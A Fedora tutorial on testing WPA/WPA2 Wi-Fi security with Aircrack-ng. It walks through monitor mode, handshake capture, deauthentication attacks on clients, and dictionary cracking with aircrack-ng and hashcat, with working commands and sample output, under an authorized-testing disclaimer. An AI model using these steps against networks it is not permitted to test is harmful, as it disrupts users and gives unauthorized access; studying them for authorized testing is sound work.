Fedora

Cracking WPA/WPA2 with Aircrack-ng on Fedora

This guide covers testing WPA/WPA2 network security using the Aircrack-ng suite on Fedora Linux. We'll capture the four-way handshake and perform dictionary attacks to recover the pre-shared key.

Legal Disclaimer: Only perform these techniques on networks you own or have explicit written permission to test. Unauthorized access to computer networks is illegal and can result in criminal prosecution. This guide is for educational and authorized penetration testing purposes only.

How WPA/WPA2 Cracking Works

WPA/WPA2 uses a robust encryption scheme that cannot be broken through statistical analysis like WEP. The only viable attack is:

  1. Capture the four-way handshake between a client and access point
  2. Perform a dictionary attack comparing password hashes against a wordlist

The handshake occurs when a client connects to the network. If no clients are actively connecting, we can force a reconnection by sending deauthentication frames.

Key limitation: This attack only succeeds if the password exists in your wordlist.

Note: This technique does not work against WPA3, which uses Simultaneous Authentication of Equals (SAE) and is immune to offline dictionary attacks.

Prerequisites

Hardware Requirements

You need a wireless adapter that supports:

  • Monitor mode – Passive packet capture
  • Packet injection – Sending raw 802.11 frames

Recommended adapters:

  • Alfa AWUS036ACH (dual-band, 802.11ac)
  • Alfa AWUS036ACHM (dual-band, newer chipset)
  • Alfa AWUS1900 (high power, quad-antenna)
  • TP-Link TL-WN722N v1 (budget option, Atheros chipset)

Note: Many built-in laptop wireless cards don't support monitor mode or injection. Check the Aircrack-ng compatibility list for your chipset.

Install Aircrack-ng

Unlike Kali Linux where it's pre-installed, Fedora requires manual installation:

sudo dnf install aircrack-ng

Verify installation:

aircrack-ng --version

You should see output like:

Aircrack-ng 1.7  - (C) 2006-2022 Thomas d'Otreppe

Optional: Install Hashcat for GPU Cracking

For faster password cracking with GPU acceleration:

sudo dnf install hashcat

Note: For GPU acceleration, you'll need appropriate OpenCL drivers installed. AMD users need rocm-opencl or mesa-libOpenCL, NVIDIA users need xorg-x11-drv-nvidia-cuda. Without GPU drivers, hashcat falls back to CPU mode.

Download a Wordlist

Fedora doesn't include wordlists by default. Download the famous rockyou.txt:

# Create a wordlists directory
mkdir -p ~/wordlists

# Download rockyou.txt (134MB, ~14 million passwords)
curl -L -o ~/wordlists/rockyou.txt \
  https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Verify the download:

wc -l ~/wordlists/rockyou.txt
# Should show approximately 14,341,564 lines

Step 1: Identify Your Wireless Interface

List your network interfaces:

iwconfig

Look for your wireless adapter (typically wlan0 or wlp3s0):

wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated
          ...

Note the interface name—we'll use wlan0 throughout this guide.

You can also use:

ip link show

Step 2: Stop NetworkManager

NetworkManager can interfere with monitor mode by changing channels or resetting the interface. Stop it first:

sudo systemctl stop NetworkManager

Note: Your regular network connection will stop working until you restart NetworkManager.

Alternatively, use airmon-ng to kill all interfering processes:

sudo airmon-ng check kill

This stops processes like:

  • NetworkManager
  • wpa_supplicant
  • dhclient

Step 3: Enable Monitor Mode

Put your wireless adapter into monitor mode:

sudo airmon-ng start wlan0

Output:

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Qualcomm Atheros AR9271

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Your interface is now wlan0mon (monitor mode). Verify with:

iwconfig wlan0mon

You should see Mode:Monitor.

Alternative: Manual Monitor Mode

If airmon-ng doesn't work, enable monitor mode manually:

sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

To verify:

iw dev wlan0 info
# Should show "type monitor"

Step 4: Scan for Target Networks

Start scanning for nearby wireless networks:

sudo airodump-ng wlan0mon

You'll see a live display:

 CH  9 ][ Elapsed: 1 min ][ 2026-01-09 16:45

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:14:6C:7E:40:80  -67      234      1245   12   6   54e  WPA2 CCMP   PSK  HomeNetwork
 A0:B1:C2:D3:E4:F5  -72       89       456    3  11   54e  WPA2 CCMP   PSK  CoffeeShop

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2  -45    54e-54      0      892
 00:14:6C:7E:40:80  48:A9:1C:3D:2E:8F  -52    54e-54      0      234

Top section: Access points
Bottom section: Connected clients

Note down for your target:

  • BSSID: 00:14:6C:7E:40:80 (AP's MAC address)
  • CH: 6 (channel)
  • ESSID: HomeNetwork (network name)
  • Client MAC: 00:0F:B5:FD:FB:C2 (for targeted deauth)

Press Ctrl+C to stop scanning.

Step 5: Capture the Handshake

Focus on your target network and start capturing:

sudo airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w capture wlan0mon

Parameters:

  • -c 6 — Lock to channel 6
  • --bssid 00:14:6C:7E:40:80 — Filter by target AP
  • -w capture — Output file prefix
  • wlan0mon — Monitor interface

Leave this running in the terminal. It will create files like capture-01.cap.

Step 6: Force a Handshake (Deauthentication)

Open a new terminal and send deauthentication frames to force clients to reconnect:

Option A: Deauth All Clients (Broadcast)

sudo aireplay-ng -0 5 -a 00:14:6C:7E:40:80 wlan0mon

Option B: Deauth Specific Client (More Reliable)

sudo aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon

Parameters:

  • -0 5 — Deauthentication mode, send 5 packets
  • -a — Target AP's BSSID
  • -c — Target client's MAC (optional but more effective)

Output:

16:48:23  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 6
16:48:23  Sending 64 directed DeAuth (code 7). STMAC: [00:0F:B5:FD:FB:C2]
16:48:24  Sending 64 directed DeAuth (code 7). STMAC: [00:0F:B5:FD:FB:C2]
...

Verify Handshake Capture

Watch your airodump-ng window. When a handshake is captured, you'll see:

 CH  6 ][ Elapsed: 2 mins ][ 2026-01-09 16:50 ][ WPA handshake: 00:14:6C:7E:40:80

The WPA handshake: [BSSID] message confirms success. You can now stop airodump-ng with Ctrl+C.

Step 7: Crack the Password

Using Aircrack-ng (CPU-based)

aircrack-ng -w ~/wordlists/rockyou.txt -b 00:14:6C:7E:40:80 capture-01.cap

Parameters:

  • -w — Path to wordlist
  • -b — Target BSSID
  • Last argument — Capture file

Successful Output

                               Aircrack-ng 1.7

      [00:05:23] 1823741/14344392 keys tested (5765.32 k/s)

      Time left: 36 minutes, 12 seconds                      12.71%

                          KEY FOUND! [ SuperSecret123 ]

      Master Key     : A1 B2 C3 D4 E5 F6 77 88 99 AA BB CC DD EE FF 00
                       11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF 00

      Transient Key  : 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0
                       ...

      EAPOL HMAC     : AB CD EF 01 23 45 67 89 AB CD EF 01 23 45 67 89

The password is SuperSecret123.

Failed Attempt

If the password isn't in your wordlist:

                               Aircrack-ng 1.7

      [00:42:17] 14344392/14344392 keys tested (5612.43 k/s)

      Time left: 0 seconds                                  100.00%

      KEY NOT FOUND

      Passphrase not in dictionary

Try a different or larger wordlist, or use hashcat for GPU-accelerated cracking.

Step 8: GPU-Accelerated Cracking with Hashcat

For faster cracking, convert the capture and use hashcat:

# Install hcxtools if not already installed
sudo dnf install hcxtools

# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap

# Crack with hashcat (GPU-accelerated)
hashcat -m 22000 hash.hc22000 ~/wordlists/rockyou.txt

Performance comparison:

  • Aircrack-ng (CPU): ~5,000 keys/second
  • Hashcat (GPU): ~400,000+ keys/second

Step 9: Restore Normal Networking

When you're done, disable monitor mode and restore network services:

# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Restart NetworkManager
sudo systemctl start NetworkManager

If you used manual monitor mode, revert to managed mode:

sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up
sudo systemctl start NetworkManager

Quick Reference

Step Command
Install aircrack-ng sudo dnf install aircrack-ng
Stop NetworkManager sudo systemctl stop NetworkManager
Kill interfering processes sudo airmon-ng check kill
Enable monitor mode sudo airmon-ng start wlan0
Scan networks sudo airodump-ng wlan0mon
Capture handshake sudo airodump-ng -c [CH] --bssid [MAC] -w capture wlan0mon
Deauthenticate clients sudo aireplay-ng -0 5 -a [AP_MAC] -c [CLIENT_MAC] wlan0mon
Crack password aircrack-ng -w wordlist.txt capture-01.cap
Disable monitor mode sudo airmon-ng stop wlan0mon
Restore networking sudo systemctl start NetworkManager

Troubleshooting

"No handshake captured"

  • Ensure clients are connected to the target network
  • Get physically closer to the AP and clients
  • Try deauthenticating specific clients instead of broadcast
  • Verify you're on the correct channel
  • Some clients may not reconnect automatically—be patient

"Interface doesn't support monitor mode"

  • Check if your adapter is compatible with aircrack-ng
  • Try updating your kernel and drivers: sudo dnf upgrade
  • Some drivers need additional firmware: sudo dnf install linux-firmware
  • Consider purchasing a compatible USB adapter

"Passphrase not in dictionary"

  • Try larger wordlists:
  • Use rule-based attacks with hashcat
  • Create custom wordlists based on target information

"Channel hopping" or unstable capture

  • Make sure you killed all interfering processes
  • Verify NetworkManager is stopped: systemctl status NetworkManager
  • Lock to the target channel with -c

airmon-ng not creating monitor interface

Try the manual method:

sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

Fedora vs Kali: Key Differences

Aspect Fedora Kali Linux
Aircrack-ng dnf install aircrack-ng Pre-installed
Wordlists Manual download required rockyou.txt included
Purpose General-purpose OS Penetration testing focused
Default tools Minimal security tools Full security toolkit

Fedora works well for wireless security testing, but requires more setup than Kali. If you do this frequently, consider using Kali Linux or creating a dedicated Fedora security toolkit.

References

Official Documentation:

Fedora Packages:

Wordlists:

  • rockyou.txt – Classic password list (~14M passwords)
  • SecLists – Comprehensive security wordlists

Read next